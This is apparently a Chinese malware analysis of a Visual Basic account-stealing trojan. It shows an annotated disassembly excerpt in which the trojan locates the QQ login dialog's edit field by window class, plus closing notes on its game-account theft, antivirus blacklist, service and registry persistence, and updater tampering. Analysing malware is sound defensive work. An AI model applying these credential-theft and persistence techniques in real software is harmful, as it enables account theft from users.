00427E93 /0F84 95000000 je dumped_.00427F2E ; taken when the preceding test (outside the excerpt) is zero
00427E99 |8D45 08 lea eax,dword ptr ss:[ebp+8]
00427E9C |50 push eax ; ByRef hwnd
00427E9D |E8 C5000000 call dumped_.00427F67 ; -> class-name string (inferred)
00427EA2 |8BD0 mov edx,eax
00427EA4 |8D4D D8 lea ecx,dword ptr ss:[ebp-28]
00427EA7 |E8 52B5FDFF call <jmp.&msvbvm50.__vbaStrMove> ; [ebp-28] = result
00427EAC |FF75 D8 push dword ptr ss:[ebp-28]
00427EAF |68 CC9E4000 push dumped_.00409ECC ; UNICODE "Edit" ; the edit control on the QQ login dialog (author's note)
00427EB4 |E8 03B5FDFF call <jmp.&msvbvm50.__vbaStrCmp> ; StrComp — 0 when equal (author: compare)
00427EB9 |85C0 test eax,eax
00427EBB |75 76 jnz short dumped_.00427F33 ; not an Edit control -> skip
00427EBD |FF75 08 push dword ptr ss:[ebp+8] ; hwnd ByVal
00427EC0 |E8 B3EAFDFF call dumped_.00406978 ; -> parent handle (inferred)
00427EC5 |8BF0 mov esi,eax
00427EC7 |E8 02B5FDFF call <jmp.&msvbvm50.__vbaSetSystemError> ; Declare epilogue
00427ECC |8D45 CC lea eax,dword ptr ss:[ebp-34]
00427ECF |50 push eax ; ByRef parent (stored on the next line, before the call)
00427ED0 |8975 CC mov dword ptr ss:[ebp-34],esi
00427ED3 |E8 8F000000 call dumped_.00427F67 ; class name of the parent (inferred)
00427ED8 |8BD0 mov edx,eax
00427EDA |8D4D D4 lea ecx,dword ptr ss:[ebp-2C]
00427EDD |E8 1CB5FDFF call <jmp.&msvbvm50.__vbaStrMove>
00427EE2 |50 push eax
00427EE3 |68 60674000 push dumped_.00406760 ; UNICODE "#32770" ; dialog-box class — the QQ login box (author's note)
00427EE8 |E8 CFB4FDFF call <jmp.&msvbvm50.__vbaStrCmp> ; compare; the branch on this result is outside the excerpt (author: compare)
==========================================================================
太累了就先暂停到这里,
发现程序还可以盗WOW、梦幻、联众的账号,并且有个黑名单,杀软都在里面。用服务启动,在注册表也有藏匿,还关联了EXPLORER。
对WOW,梦幻等升级程序进行破解,让它不能升级.
------------------------------------------------------------------------
还是第一次看到这样的盗号软件,用VB写的这么多功能.
------------------------------------------------------------------------
【版权声明】BY FoBnN qq:380838221